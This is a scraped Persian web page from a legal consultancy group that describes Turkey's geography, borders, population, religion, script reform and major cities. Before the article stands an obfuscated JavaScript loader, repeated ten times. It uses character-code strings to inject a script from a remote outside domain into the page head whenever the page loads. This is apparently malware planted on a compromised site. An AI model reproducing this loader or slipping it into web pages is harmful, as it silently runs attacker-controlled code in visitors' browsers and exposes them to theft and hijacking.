Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); جغرافیای ترکیه | گروه مشاورین حقوقی وزیری

جغرافیای ترکیه

مساحت ترکیه ۷۸۳٬۳۵۶ کیلومتر مربع است
از نظر جغرافیایی کشوری کوهستانی و پر باران محسوب می شود

ترکیه و شرایط جغرافیایی

 

کشور ترکیه که به ترکی استانبولی Türkiye خوانده می شود، در منطقه ای اوراسیایی (اروپایی-آسیایی) واقع شده و دارای دو بخش می باشد. قسمت آناتولی که در قسمت شمال غرب قاره آسیا و خاورمیانه واقع شده بخش بزرگی از این کشور را به خود اختصاص داده و بخش کوچک تر این کشور نیز که تراکیه نامیده می شود در منطقع بالکان قرار دارد.

کشور زیبای ترکیه از قسمت شرق با کشورهای ایران، جمهوری آذربایجان، ارمنستان و گرجستان و از قسمت جنوب شرقی با کشور عراق و سوریه هم مرز است.

همچنین این کشور از قسمت شمال غربی با بلغارستان و یونان هم مرز و همسایه می باشد.

کشور ترکیه از شمال به دریای سیاه و از غرب به دو دریای مرمره و اژه و از قسمت جنوب غربی به دریای مدیترانه راه دارد که دو تنگه مهم بسفر و داردانل نیز در اختیار این کشور می باشد و نقشی حیاتی را در اقتصاد و جغرافیای این کشور ایفا می کند.

همچنین جایگاه قرارگیری ترکیه در منطقه به گونه ای است که مانند پلی دو قاره آسیا و اروپا را به یکدیگر مرتبط می نماید و از موقعیت راهبردی و جغرافیایی مناسبی برخوردار بوده و بیشتر کشورها از جمله ایران از این کشور به عنوان مسیری برای ترانزیت کالا به اروپا استفاده می کنند.

 

وسعت

مساحت ترکیه ۷۸۳٬۳۵۶ کیلومتر مربع است و از نظر جغرافیایی کشوری کوهستانی و پر باران محسوب می شود به همین جهت از آب و هوای خوب و جلگه ای برخوردار بوده و به جهت وجود مکان های دیدنی و زیبا هر ساله توریست های زیادی از کشورهای دیگر برای دیدن ترکیه به این کشور سفر می کنند.

جمعیت و مذهب

جمعیت ترکیه تا سال 2018 در حدود ۸۲ میلیون نفر برآورد شده است که 8/99 درصد مردم مسلمان می باشند و از این تعداد نیز ۷۵ تا ۸۵ درصد سنی و ۱۵ تا ۲۵ درصد هم شیعه علوی هستند. حکومت ترکیه لائیک است ولی بسیاری از مردم به دین اسلام پایبند هستند و عید فطر و عید قربان در این کشور تعطیل رسمی است.

تا پیش از آن که ترک‌های آسیای مرکزی در اوایل قرن یازدهم میلادی دین اسلام را برگزینند، دین مسیحیت در ترکیه رواج داشت. در سال 1924 هم دین اسلام در نخستین قانون اساسی کشور ترکیه به عنوان دین رسمی جامعه تعیین شد، اما در سال 1928 و در دوره رهبری فردی قدرتمند به نام مصطفی آتاتورک این ماده قانونی حذف و با تاکید بر جدایی دین از سیاست، ترکیه به عنوان کشوری کشوری غیر مذهبی (لائیک) معرفی شد. بعدها نیز در سال 1982 به هنگام تدوین قانون اساسی، این قانون به طور مجدد در این کشور تصریح و تصویب گردید.

زبان و خط

زبان ترکی، زبان رسمی ترکیه است و یکی از زبان های قدیمی دنیا به شمار می آید و می توان گفت در حال حاضر در سراسر دنیا 83 میلیون نفر به زبان ترکی صحبت می کنند. زبان های دیگری نیز در این کشور رایج است که می توان به زبان کردی، عربی و انگلیسی اشاره کرد.

در ترکیه قدیم یعنی قبل از پذیرش دین اسلام خط خاصی وجود نداشت و بیشتر متون به صورت شفاهی بود که از نسلی به نسل دیگر انتقال می یافت و شاید بتوان گفت قدیمی ترین متونی که از این دوره باقی مانده کتیبه اورخون ( Orkhon ) است.

اما در دوره فرهنگ اسلامی یعنی دوره ای که فرهنگ ایران و اعراب بر این کشور تاثیر گذاشت، کلمات فارسی و عربی و حتی ساختار اصلی و دستوری این زبان ها وارد زبان ترکی شد و بدین شکل زبان و خط دولت عثمانی به وجود آمد.

اما در دوره مدرن که دوره تاثیر تفکر و ادبیات غربی بر این کشور به شمار می آید و از قرن 20 تا به امروز شکل گرفته است، خط این کشور تغییر یافت و حرف لاتین به جای حروف عربی مورد استفاده قرار گرفت.

به طوری که در سال 1928 یعنی زمانی که رهبری ترکیه را آتاتورک بر عهده داشت، مقرر شد حروف و الفبای عربی، از الفبا و زبان کشور ترکیه حذف گردد و به جای آن 29حرف از حروف لاتین به همراه 21حرف صامت و 8 حرف مصوت، در نوشتار مورد استفاده قرار گرفت. در پی این تغییر بسیاری از کلمات فارسی، عربی و … نیز از این زبان حذف شد.

پایتخت و شهرهای بزرگ ترکیه

پایتخت ترکیه شهر آنکارا است که به عنوان پایتخت سیاسی کشور ترکیه شناخته می شود و پس از استانبول، دومین شهر بزرگ این کشور محسوب می‌شود که در حدود 5 میلیون نفر جمعیت داشته و آرامگاه پدر ترکیه “آتاتورک”، نیز در این شهر قرار دارد.

مهم‌ترین شهر ترکیه، پس از آنکارا شهر استانبول است که به عنوان پایتخت فرهنگی این کشور به شمار آمده و در حدود 20 میلیون نفر جمعیت دارد.

در این شهر مساجد بزرگ و متعددی وجود دارد که از دوره عثمانی بر جای مانده که زیباترین و سرآمد آن ها مسجد ایاصوفیه است که از معماری بی نظیری برخوردار است و از زمان آتاتورک به موزه تبدیل شده و هر ساله تعدادی زیادی توریست از نقاط مختلف جهان از این مسجد بازدید می کنند.

ازمیر به عنوان سومین شهر بزرگ ترکیه از نظر تجاری و اقتصادی یکی از شهرهای مهم ترکیه به شمار می آید.

شهر آنتالیا نیز یکی دیگر از شهرهای این کشور است که به دلیل موقعیت و سواحل زیبایی که دارد از نظر جذب توریست قطب مهمی در این کشور محسوب می شود.

پس از آن کوش آداسی نیز به جهت نزدیک بودن به جزیره یونانی ها جزء جاذبه های گردشگری کشور ترکیه به شمار می آید.

از دیگر شهرهای مهم ترکیه می‌توان به بورسا، آدانا، قونیه، غازی عینتاب، قیصریه، مرسین، اشاره کرد.